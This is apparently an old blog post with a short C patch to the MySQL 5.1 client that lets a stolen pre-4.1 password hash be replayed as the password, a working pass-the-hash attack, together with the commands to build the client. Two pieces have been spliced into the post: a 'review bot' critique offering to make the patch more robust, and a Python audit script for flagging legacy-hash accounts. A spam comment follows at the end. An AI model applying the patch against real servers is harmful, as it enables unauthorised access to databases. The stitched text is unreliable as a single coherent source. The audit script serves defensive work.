Wednesday, January 11, 2012

MySQL 323 Hash Pass-the-hash

This is just a note on a known, old problem. If a MySQL user's password hash was produced by the OLD_PASSWORD() function, or was imported from a very old version, the hash is equivalent to the password itself: you do not need to crack the hash to log in to MySQL.

Here is my patch for libmysql_r/password.c for MySQL version 5.1.55.

--- password.c.orig     2012-01-11 21:32:02.644042061 +0700
+++ password.c  2012-01-11 21:33:30.676109909 +0700
@@ -191,6 +191,7 @@ void scramble_323(char *to, const char *
     char extra, *to_start=to;
     const char *message_end= message + SCRAMBLE_LENGTH_323;
     hash_password(hash_pass,password, (uint) strlen(password));
+    if (strlen(password) == 16) sscanf(password, "%8lx%8lx", &hash_pass[0], &hash_pass[1]);
     hash_password(hash_message, message, SCRAMBLE_LENGTH_323);
     randominit(&rand_st,hash_pass[0] ^ hash_message[0],
                hash_pass[1] ^ hash_message[1]);
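Review bot: the added `if (strlen(password) == 16)` line treats every 16-character password as a hex-encoded pre-4.1 hash and ignores the return value of sscanf, so a genuine 16-character password containing non-hex characters leaves hash_pass[0] and hash_pass[1] partially overwritten with a mix of parsed digits and the hash_password() result. Parse into two temporaries, assign them to hash_pass only when sscanf returns 2, and add a comment above the line stating that a 16-character hex string is being interpreted as a stored OLD_PASSWORD() hash rather than as a password.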

Here are the commands to build only the client.

$ ./configure --without-server
$ make
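The practical consequence for an administrator is that any account whose stored hash is still in the 16-hex-character pre-4.1 format should be re-set before someone replays it. The following is an added audit helper, not part of the original post; it assumes a dump of the mysql.user `user`, `host` and `password` columns (the 5.1 column name) as constructed sample rows and flags the accounts that need attention.

```python
import re

# Constructed sample of (user, host, password) rows from mysql.user for illustration.
# The 16-hex-digit value is the pre-4.1 OLD_PASSWORD() format discussed in the post;
# none of these are real credentials.
SAMPLE_USER_ROWS = [
    ("root", "localhost", "*0123456789ABCDEF0123456789ABCDEF01234567"),
    ("legacy_app", "%", "5d2e19393cc5ef67"),
    ("report", "10.0.0.%", ""),
    ("odd", "localhost", "notahashatall"),
]

OLD_HASH = re.compile(r"^[0-9a-fA-F]{16}$")      # pre-4.1: two 32-bit words in hex
NATIVE_HASH = re.compile(r"^\*[0-9a-fA-F]{40}$")  # 4.1+: '*' + SHA1(SHA1(pw)) in hex


def classify_hash(value):
    """Return which MySQL password-hash format a mysql.user.password value uses."""
    if value == "":
        return "empty"
    if OLD_HASH.match(value):
        # The stored value doubles as the credential for the 323 scramble.
        return "pre-4.1"
    if NATIVE_HASH.match(value):
        # Challenge/response needs the plaintext, so the hash alone is not enough.
        return "native-4.1"
    return "unknown"


def find_legacy_accounts(rows):
    """Return [(user, host)] for every account whose hash should be re-set."""
    return [(user, host) for user, host, pw in rows if classify_hash(pw) == "pre-4.1"]


if __name__ == "__main__":
    for user, host in find_legacy_accounts(SAMPLE_USER_ROWS):
        print(f"pre-4.1 hash still in use: '{user}'@'{host}'")
```

Flagged accounts should get a fresh `SET PASSWORD` with `old_passwords=0` so the 41-character format is stored, and the server can be started with `--secure-auth` to refuse logins for accounts that still carry a pre-4.1 hash.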

2 comments:

  1. Hi.

    Thanks for sharing this information with us. This information about SQL programming was so useful to us; thanks for sharing it with us.

    Here is sharing some Salesforce Service Cloud information that may be helpful to you.

    Salesforce Service Cloud Training
